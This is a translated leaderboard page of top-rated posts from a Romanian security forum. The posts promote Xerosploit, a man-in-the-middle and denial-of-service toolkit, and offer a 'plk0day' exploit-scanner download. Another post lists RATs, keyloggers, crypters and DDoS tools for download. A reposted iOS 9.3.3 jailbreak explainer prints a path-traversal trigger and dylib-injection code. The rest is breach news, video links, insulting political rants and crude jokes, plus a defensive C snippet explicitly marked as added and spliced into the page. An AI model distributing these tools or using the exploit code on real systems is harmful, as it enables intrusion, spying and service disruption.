Leaderboard
Popular Content
Showing content with the highest reputation on 08/29/16 in all areas
-
Xerosploit is a penetration testing toolkit whose goal is to perform man-in-the-middle attacks for testing purposes. It brings various modules that allow efficient attacks to be carried out, and also allows denial-of-service attacks and port scanning. Powered by bettercap and nmap.

Dependencies
* nmap
* hping3
* build-essential
* ruby-dev
* libpcap-dev
* libgmp3-dev
* tabulate
* terminaltables

Installation
Dependencies will be automatically installed.

    git clone https://github.com/LionSec/xerosploit
    cd xerosploit && sudo python install.py
    sudo xerosploit

Tested on

Operating system    Version
Ubuntu              16.04 / 15.10
Kali linux          Rolling / Sana
Parrot OS           3.1

Features
* Port scanning
* Network mapping
* DoS attack
* HTML code injection
* JavaScript code injection
* Download interception and replacement
* Sniffing
* DNS spoofing
* Background audio reproduction
* Images replacement
* Driftnet
* Webpage defacement
* and more ...

Contact:
Website: http://lionsec.net
Youtube: https://youtube.com/inf98es
Facebook: https://facebook.com/in98
Twitter: @LionSec1
Email: ledonman@gmail.com

5 points
-
During the presidential campaign I tried to explain to people I know, including intelligent, educated people, that for the past 25 years, up to and including now, everything has been based on manipulation and political mythology: the myth of the savior, the myth of the scapegoat, and now the myth of the German. They all said, "so what?" "So what"... and that is how it is going to stay.

3 points
-
Buffer Overflow Attacks Explained: Saved Return Pointer Overwrite
In today’s Whiteboard Wednesday, David Maloney, Senior Security Researcher at Rapid7, will discuss buffer overflow attacks. David will walk you through a buffer overflow exploit called “saved return pointer overwrite” to show you specifically how buffer overflow attacks work. Watch this week’s Whiteboard Wednesday to learn more.
https://www.rapid7.com/resources/videos/buffer-overflow-exploit-explained.jsp

Mitigating Buffer Overflow Attacks with Stack Cookies
In today’s Whiteboard Wednesday, David Maloney, Senior Security Researcher at Rapid7, will share a technique to help mitigate buffer overflow attacks. In a previous Whiteboard Wednesday, we explained how buffer overflow attacks work. This week, we are going to explain how to help mitigate buffer overflow vulnerabilities with stack cookies. Watch this week’s Whiteboard Wednesday to learn more.
https://www.rapid7.com/resources/videos/mitigating-buffer-overflow-attacks-with-stack-cookies.jsp

Exploit Explained: Structured Exception Handler Overwrite
In today’s Whiteboard Wednesday, David Maloney, Sr. Security Engineer at Rapid7, will talk about structured exception handler overwrite vulnerabilities and how they work. Watch this week’s Whiteboard Wednesday to learn more.
https://www.rapid7.com/resources/videos/structured-exception-handler-overwrite-explained.jsp

SEHOP: Mitigating Structured Exception Handler Overwrite Vulnerabilities
In today’s Whiteboard Wednesday, David Maloney, Sr. Security Researcher at Rapid7, will discuss how SEHOP can help you mitigate structured exception handler overwrite vulnerabilities.
https://www.rapid7.com/resources/videos/mitigating-seh-overwrites-with-sehop.jsp

Exploit Explained: Return Oriented Processing (ROP)
In today’s Whiteboard Wednesday, David Maloney, Sr. Security Researcher at Rapid7, will discuss the ROP exploit technique for buffer overflow vulnerabilities.
https://www.rapid7.com/resources/videos/rop-exploit-explained.jsp

Mitigating Return Oriented Processing (ROP) Vulnerabilities
In today’s Whiteboard Wednesday, David Maloney, Sr. Security Researcher at Rapid7, will discuss the ROP exploit technique for buffer overflow vulnerabilities and how to mitigate these security issues.
https://www.rapid7.com/resources/videos/mitigating-rop-vulnerabilities.jsp

3 points
-
- Hey, you lunatic from the cornstalks, BackTrack was open source, why would you pirate the CDs, and how?
- For brutal force, go on Google and search for "brutal forced ass worship"
- Leave that damn button alone. Lay off the weed if you want to achieve anything.

2 points
-
The people at this association help with this kind of thing: https://gloryholefoundation.com/

1 point
-
http://www.liberties.eu/en/news/romanian-secret-services-granted-european-fund-for-mass-surveillance

1 point
-
Yes, this has come up in several news reports, but in typical Romanian fashion the public accepts being spat in the mouth with its usual candor. Some even volunteer. Whoever still lives in that country of baboons deserves even worse. Freedom is an illusion anyway, but at least elsewhere the illusion is sold with less nerve.

1 point
-
I asked because I knew you had switched to the UK; in the past you invoiced through DE. Thanks, I'll pass it on :beer:

1 point
-
Non-payer. Invoicing is done by the UK company. You previously had a server with me for some company. (I don't know whether I invoiced from the DE company or from the UK one.)

1 point
-
What is the jailbreak for iOS 9.3.3 actually doing? – Part 1
Friday 26 August 2016 / by James Shanahan

Many people who jailbreak their devices are unaware of the vulnerabilities being exploited in order to gain privileged access to the underlying iOS operating system. Users typically jailbreak devices in order to install applications that have not undergone Apple’s software evaluation process. This post will explore the low level mechanics of the iOS 9.3.3 jailbreak as an educational case study.

There are many restrictions in place that are enforced for applications and users. A Jailbreak ultimately requires a bug in the kernel that can be exploited. Restrictions include KASLR, SMAP, KPP and the App Sandbox. In order to gain access to the kernel, there are typically multiple software flaws and misconfigurations that must be leveraged, which then leads to access as a privileged and unrestricted user.

Overview of iOS Security Architecture

Below is a high level diagram of the iOS Security Architecture that demonstrates security controls that are in place between the hardware/firmware and software.

[Figure: iOS security architecture]

The App Sandbox is designed to ensure that apps are doing what they’re supposed to do. It is also there to protect applications from unintentional bugs that may be introduced through flaws in the code or inherited from a framework. Contrary to an application without App Sandbox, an application with App Sandbox limits the resources on a per app basis to protect from such flaws. App Sandbox is there as a last line of defense against various attacks that can be utilized to gain access, delete, or corrupt data pertaining to the targeted application. The image below depicts how an application is protected using the App Sandbox.

[Figure: With and without App Sandbox]

XPC

XPC is an advanced framework that is built on Mach messages and simplifies low level Inter-process Communication (IPC). XPC allows communication between Application and System services.
These messages are passed between an XPC Server and XPC Client. XPC is widely used by system frameworks and first-party applications. You can run the following command to survey the inventory of XPC services that are on a given iOS or OS X system:

    find /Applications -name \*.xpc

Exploiting Userland vulnerability in assetsd via XPC message

Now we understand some of the various technologies used to mitigate certain issues targeting iOS applications, as well as some of those that will be used as an exploit vehicle to trigger Userland code execution. Let’s take a look at how the iOS 9.3.3 Jailbreak works under the hood.

A vulnerability exists in assetsd that allows files and directories to be moved to a new location. In iOS 9.3.3 container apps can communicate with a service provided by /System/Library/Frameworks/AssetsLibrary.framework named com.apple.PersistentURLTranslator.Gatekeeper via XPC. There is a method that allows a user to move a specified file or directory in /var/mobile/MEDIA/DCIM. The problem is that srcPath and destSubdir are derived from user input retrieved in XPC messages which lack validation. It is possible to use commonly known path traversal tricks such as ../ in the srcPath and destSubdir parameters which lead to arbitrary file reads/writes as the iOS mobile user.
This is what a sample XPC message that triggers the issue in assetsd would look like:

    // code snippet – thx Pangu
    xpc_connection_t client = xpc_connection_create_mach_service("com.apple.PersistentURLTranslator.Gatekeeper", NULL, 0);
    xpc_connection_set_event_handler(client, ^void(xpc_object_t response) {
    });
    xpc_connection_resume(client);

    xpc_object_t dict = xpc_dictionary_create(NULL, NULL, 0);

    NSString *dstPath = [@"../../../../../../../" stringByAppendingPathComponent:dest];

    xpc_dictionary_set_string(dict, "srcPath", [src UTF8String]);
    xpc_dictionary_set_string(dict, "destSubdir", [dstPath UTF8String]);
    xpc_dictionary_set_int64(dict, "transactionID", 4);
    xpc_dictionary_set_int64(dict, "operation", 4);

    xpc_object_t reply = xpc_connection_send_message_with_reply_sync(client, dict);

The issue is triggered on line 10.

Utilizing dyld (Dynamic Linker) to Get Arbitrary Code Execution

To inject a dylib into a system process, an attacker can utilise the DYLD_INSERT_LIBRARIES environment variable, but the executable must have the get-task-allow entitlement. The Pangu team checked all executables in iOS 9 and did not identify one that had the get-task-allow entitlement. They were excited to find that the developer disk images (DDI) did allow this by running the following command:

    codesign -d --entitlements - .//usr/libexec/vpnagent

That command above produces the following output which proves that vpnagent has the entitlement needed:

    <plist version=1.0>
    <dict>
    <key>get-task-allow</key>
    <true/>

In order to make this executable, the old Developer Disk Image (DDI) that contains vpnagent should be mounted. Even though a failure will occur, MobileStorageMounter will register the trustcache hash values for executables which are signed by Apple. MobileStorageMounter will then notify the kernel that vpnagent is a platform binary without creating any code signing failures on iOS 9.
The kernel enforces the sandbox profile for a particular executable in a couple of different ways. First, the default container sandbox profile will be applied if the vpnagent executable is located in /private/var/mobile/Containers/Data/. If the executable is located somewhere else on the system, the kernel will apply the seatbelt-profile, which is specified in the executable’s signature segment. A sample of what one may look like is as follows:

    (version 1)
    (debug allow)
    (allow process*)
    (deny default)

Enabling Debugging

In order to enable debug server on iOS 9 a normal DDI should be mounted.

Utilizing assetsd Path Traversal XPC Vulnerability to Execute Arbitrary Code

The next step is to send a specifically crafted XPC message to exploit a path traversal vulnerability in assetsd to move the vpnagent from the DDI to a place that the debugserver has access to. Once the executable is moved to a path outside of /private/var/mobile/Containers/Data, the sandbox seatbelt-profile will be applied. This will ensure that the kernel does not apply the default sandbox profile.

Putting the VPN Agent in Debug Mode and Performing Code Injection

Once this has been performed, the debugserver will allow a process with the get-task-allow entitlement to continually run even if code signing invalidation occurs. A dylib can now be injected using the DYLD_INSERT_LIBRARIES environment variable. DYLD_INSERT_LIBRARIES is very similar to LD_PRELOAD on Linux. The signature of a system binary should be used when loading the dylib so that the kernel will believe that the vpnagent is loading an iOS 9 system binary.
Below is sample code that demonstrates simple code injection on OS X:

    #import "ACCalculatorOverrides.h"
    #include <stdio.h>
    #include <objc/runtime.h>
    #include <Foundation/Foundation.h>
    #include <AppKit/AppKit.h>

    static IMP sOriginalImp = NULL;

    @implementation ACCalculatorOverrides

    +(void)load
    {
        // We replace the method -[CalculatorController showAbout:] with the method -[ACCalculatorOverrides patchedShowAbout:]
        Class originalClass = NSClassFromString(@"CalculatorController");
        Method originalMeth = class_getInstanceMethod(originalClass, @selector(showAbout:));
        sOriginalImp = method_getImplementation(originalMeth);

        Method replacementMeth = class_getInstanceMethod(NSClassFromString(@"ACCalculatorOverrides"), @selector(patchedShowAbout:));
        method_exchangeImplementations(originalMeth, replacementMeth);
    }

    -(void)patchedShowAbout:(id)sender
    {
        // We first call the original method to display the original About Box
        sOriginalImp(self, @selector(showAbout:), self);

        // Run our custom code which simply display an alert
        NSAlert *alert = [NSAlert alertWithMessageText:@"Code has been injected!" defaultButton:@"OK" alternateButton:nil otherButton:nil informativeTextWithFormat:@"The code has been injected using DYLD_INSERT_LIBRARIES into Calculator.app"];
        [alert runModal];
    }

    @end

The following command will build this dynamic library:

    gcc -framework AppKit -framework Foundation -o CalculatorOverrides.dylib -dynamiclib ACCalculatorOverrides.m

The final step is to inject it into the application:

    DYLD_INSERT_LIBRARIES=/PATH_TO/CalculatorOverrides.dylib /Applications/Calculator.app/Contents/MacOS/Calculator &

This will result in the following:

[Figure: Performing code injection using dylib]

As shown above, an alert box was injected. This will be utilised in a similar fashion to exploit the next series of vulnerabilities that will allow a user to gain access to the device as a privileged user.
Conclusion

Most users are unaware that Jailbreaking devices requires the exploitation of security flaws and configuration weaknesses that exist on a particular version of iOS or an application running on their device. These same vulnerabilities can be exploited by those with real malicious intent. Even then, considering the Jailbreak teams do not provide complete source and steps required to jailbreak, it is hard to tell everything that they may be doing. Further details will be covered in the next blog post.

[Part 2 – To be Continued]

References
* Pangu Internals – https://www.blackhat.com/docs/us-16/materials/us-16-Wang-Pangu-9-Internals.pdf
* Jonathan Levin. (2013). Mac OS X and iOS Internals. New York, NY: John Wiley & Sons
* Amit Singh. (2007). Mac OS X Internals. New York, NY: Addison-Wesley
* Jailbreak Exploits – https://www.theiphonewiki.com/wiki/Jailbreak_Exploits
* iOS Security – iOS 9.3 or later – https://www.apple.com/business/docs/iOS_Security_Guide.pdf
* Compromising IDEVICES via Airdrop – https://2015.ruxcon.org.au/assets/2015/slides/ruxcon-2016-dowd.pptx
* Simple code injection using DYLD_INSERT_LIBRARIES environment variable – http://blog.timac.org/?p=761
* App Sandboxing – https://developer.apple.com/app-sandboxing/
* osx dylib injection – https://github.com/scen/osxinj

Source: https://labs.nettitude.com/blog/what-is-the-jailbreak-for-ios-9-3-3-actually-doing-part-1/

1 point
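The assetsd flaw described in the post above comes down to srcPath and destSubdir being used without validation. As an added example (not code from the original post, from Pangu or from Apple), here is one way a service could confine such IPC-supplied relative paths to a base directory in C; the function names and the constructed directory fixture are assumptions made for illustration.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700 /* realpath, mkdtemp, symlink */
#endif
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* True if canonical path p is base itself or lies below it. The separator
 * check stops "/x/DCIM_evil" from passing as a child of "/x/DCIM". */
static int is_within(const char *base, const char *p) {
    size_t n = strlen(base);
    return strncmp(base, p, n) == 0 && (p[n] == '\0' || p[n] == '/');
}

/* Resolve untrusted `rel` against trusted `base`. On success (0), `out`
 * (PATH_MAX bytes) holds the canonical path; -1 means reject the request. */
int confine_path(const char *base, const char *rel, char *out) {
    char cbase[PATH_MAX], joined[PATH_MAX], parent[PATH_MAX];
    if (rel[0] == '\0' || rel[0] == '/' || !realpath(base, cbase)) return -1;
    if (snprintf(joined, sizeof joined, "%s/%s", cbase, rel) >= (int)sizeof joined)
        return -1;
    if (realpath(joined, out)) /* target exists: ".." and symlinks are resolved */
        return is_within(cbase, out) ? 0 : -1;
    /* Target does not exist yet (a move destination): canonicalise its
     * parent and accept only a plain final component. */
    char *slash = strrchr(joined, '/');
    const char *leaf = slash + 1;
    if (!*leaf || !strcmp(leaf, ".") || !strcmp(leaf, "..")) return -1;
    *slash = '\0';
    if (!realpath(joined, parent) || !is_within(cbase, parent)) return -1;
    return snprintf(out, PATH_MAX, "%s/%s", parent, leaf) < PATH_MAX ? 0 : -1;
}

/* Constructed fixture: <root>/DCIM/100APPLE, <root>/DCIM_evil and a symlink
 * <root>/DCIM/link -> <root>. Writes <root>/DCIM to `base`; 0 on success. */
int make_fixture(char *base, size_t len) {
    char root[] = "/tmp/confineXXXXXX", p[PATH_MAX];
    if (!mkdtemp(root)) return -1;
    snprintf(base, len, "%s/DCIM", root);
    if (mkdir(base, 0700)) return -1;
    snprintf(p, sizeof p, "%s/100APPLE", base);
    if (mkdir(p, 0700)) return -1;
    snprintf(p, sizeof p, "%s/DCIM_evil", root);
    if (mkdir(p, 0700)) return -1;
    snprintf(p, sizeof p, "%s/link", base);
    return symlink(root, p);
}

int main(void) {
    char base[PATH_MAX], out[PATH_MAX];
    const char *cases[] = { /* constructed inputs */
        "100APPLE", "100APPLE/new.jpg", "../../../../etc",
        "../DCIM_evil", "link/DCIM_evil", "100APPLE/../../x",
    };
    if (make_fixture(base, sizeof base)) return 1;
    for (size_t i = 0; i < sizeof cases / sizeof *cases; i++)
        printf("%-20s -> %s\n", cases[i],
               confine_path(base, cases[i], out) == 0 ? out : "REJECTED");
    return 0;
}
```

The check and the later file operation are separate steps, so a real service also has to guard against the path changing in between, for example by operating on directory file descriptors with openat().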
-
He asks me what I have done for my country and why I ran away :)))
- I did my military service for a country full of thieves. By rights I should have sworn to defend the country from its politicians and leaders.
- I got a university degree.
- I invested money in businesses that the Romanian state screwed over.
- I contributed to the budget (taxes and duties), so your old man can have a pension.
I got a kick in the ass, just as all of you will. Screw the Romanian state and the flag of the baboons. If Russia invades you, I will go and enlist in the RUSSIAN army.

1 point
-
It is huge progress going from vBulletin to IPBoard. I no longer know how many lines of code I modified in that platform (vB)...

1. It is the largest security forum, not a web design one - I understand you if trivial security problems show up, not if a theme looks ugly
2. You are not the only one, but there are many people who "grew up" on the forum and who gained something from it (a job, for example), but then forgot it (you know the term - leeching)
3. The posts from January of this year were lost, that's all. And I followed the forum during that period; believe me, not much was lost
4. There are many who are interested in learning, few able (in terms of time) to help them
5. The moderators, like me, have families and jobs and no longer have time for the forum
6. That is not the profile of the RST user; it is just that those people stand out more. The forum is not meant for programmers but for IT security enthusiasts, who need to have in their blood something of what you describe. Those who are programmers come here and pick up non-programmer traits such as "think outside the box"

Pentesters (like me) spend their time around here. But there are too few who have the time and dedication needed to post quality material.

You didn't lie, I understand you, I agree with you (not entirely). It is possible that this forum will disappear, I don't deny that, but as long as we can help the Romanian community develop along the right path, the forum will remain standing.

I think of you as I do of others: you probably have the technical and psychological qualities needed to help others, but it seems you don't do it. Why? Because we Romanians only like to complain and want to see others doing something. If you want change, start with yourself.

// Nytro

1 point
-
Contains: 74 a allgo a.pl binged.txt bing.pl bios.txt b.pl expl.pl go gogo plk.pl pwn ss U vuln.log vuln.log

I take no responsibility for any sendmail inside it or for other junk. Look through it carefully before you scan with it.

Download: Download plk0day.tar from Sendspace.com - send big files the easy way http://r89x.com/plk0day.tar

1 point
-
Opera has reset passwords of all users for one of its services after hackers were able to gain access to one of its Cloud servers this week.

Opera Software reported a security breach last night, which affects all users of the sync feature of its web browser. So, if you’ve been using Opera’s Cloud Sync service, which allows users to synchronize their browser data and settings across multiple platforms, your passwords, login names, and other sensitive data may have been hacked.

Opera has around 350 Million users across its range of products, but around 1.7 Million users using its Sync service had both their synchronized passwords as well as their authentication passwords leaked in the hack.

Since the company has already reset passwords of all of its registered Opera Sync users and emailed them with details, you need not worry about your account. Additionally, the company has also informed all Opera Sync users about the security breach and recommended that they change passwords for their Opera Sync accounts as soon as possible. You can obtain a new password for Opera sync using the password resetting page.

The complete details about the intrusion and extent of the breach are yet unknown. Opera Software encouraged users to reset passwords for any third party websites they may have synced with its service. However, if you are one of those using the same password for multiple sites, you are also advised to change your passwords for those sites manually.

Since we’ve repeatedly seen folks reusing passwords across multiple services with recent high-profile account hacking, you are advised to always use a good password manager to keep a strong, unique password for your online accounts. We have listed some best password managers that would help you understand the importance of password managers and choose a suitable one according to your requirement.

Via thehackernews.com

0 points
-
-1 points
-
I'm not responsible for your activity. Use it at your own risk! Use a VM or SandBox! DL LINK! For more information! Admin Finder VPN Binders Booters Botnet Bruteforcers Chat Exploits CommView Crackers Darkcomet Ddosers Deface Creators Dork Seeker DoS - DDoS Doxing Tools Ebooks Email Encrypter and Decrypter Exploit Scanner Gmail Cracker Havij 1.15 Pro IEInspector Injectors IP scanners AccountCreators Admin Page finder Maillist Blackshades 4.8 Bombers Cpanel bruteforcer Crypters DarkComet REMOVER Deface Pages Dork List Doxers Duplicate Remover Instagram Bots Youtube Bots Keylogger md5 MSN Freezer No-IP Portscanner Proxy Finder 80 DIFFERENT RAT'S !!!! Source

-1 points
-
The chipset is on its way to being fried; you are looking at a reballing or a more unconventional method, which involves putting the motherboard in the microwave oven. Try Windows 7. Or try stable drivers; careful, take drivers from the NVIDIA site that are in the stable or recommended stage. The video card in a laptop can only be replaced by reballing, which makes the process too expensive for repairing the laptop. The price of the repair ends up reaching the price of a new laptop.

-1 points
This leaderboard is set to Bucharest/GMT+02:00